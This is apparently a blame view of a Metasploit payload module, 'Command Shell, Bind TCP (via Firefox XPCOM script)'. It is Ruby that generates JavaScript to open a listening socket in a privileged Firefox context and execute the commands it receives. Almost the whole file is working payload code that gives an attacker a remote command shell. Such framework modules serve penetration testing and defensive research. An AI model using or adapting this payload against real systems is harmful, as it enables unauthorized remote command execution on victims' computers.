Files
metasploit-gs/modules/payloads/singles/firefox/shell_bind_tcp.rb
T

78 lines
2.4 KiB
Ruby
Raw Normal View History

2014-01-02 02:09:16 -06:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2014-01-02 02:09:16 -06:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
2014-06-06 16:26:45 -05:00
require 'msf/base/sessions/command_shell_options'
2014-01-02 02:09:16 -06:00
2016-03-08 14:02:44 +01:00
module MetasploitModule
2014-01-02 02:09:16 -06:00
2015-03-09 15:44:14 -05:00
CachedSize = :dynamic
2014-01-02 02:09:16 -06:00
include Msf::Payload::Single
2014-01-02 02:20:54 -06:00
include Msf::Payload::Firefox
2014-01-02 02:09:16 -06:00
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Bind TCP (via Firefox XPCOM script)',
2014-01-13 13:57:34 -06:00
'Description' => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API},
2014-01-02 02:09:16 -06:00
'Author' => ['joev'],
'License' => BSD_LICENSE,
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
2014-05-21 15:32:29 -05:00
'PayloadType' => 'firefox'
2014-01-02 02:09:16 -06:00
))
end
#
# Returns the JS string to use for execution
#
2014-05-21 15:32:29 -05:00
def generate
2014-01-02 02:09:16 -06:00
%Q|
(function(){
window = this;
2014-01-02 02:09:16 -06:00
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var lport = #{datastore["LPORT"]};
var rhost = "#{datastore['RHOST']}";
var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
.createInstance(Components.interfaces.nsIServerSocket);
serverSocket.init(lport, false, -1);
var listener = {
onSocketAccepted: function(serverSocket, clientSocket) {
var outStream = clientSocket.openOutputStream(0, 0, 0);
var inStream = clientSocket.openInputStream(0, 0, 0);
var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
.createInstance(Components.interfaces.nsIInputStreamPump);
pump.init(inStream, -1, -1, 0, 0, true);
pump.asyncRead(clientListener(outStream), null);
}
};
2014-05-21 15:32:29 -05:00
#{read_until_token_source}
2014-01-02 02:09:16 -06:00
var clientListener = function(outStream) {
return {
onStartRequest: function(request, context) {},
onStopRequest: function(request, context) {},
2014-05-21 15:32:29 -05:00
onDataAvailable: readUntilToken(function(data) {
runCmd(data, function(err, output) {
if(!err) outStream.write(output, output.length);
});
2014-05-21 15:32:29 -05:00
})
2014-01-02 02:09:16 -06:00
};
};
2014-01-02 02:20:54 -06:00
#{run_cmd_source}
2014-01-02 02:09:16 -06:00
serverSocket.asyncListen(listener);
})();
|
end
end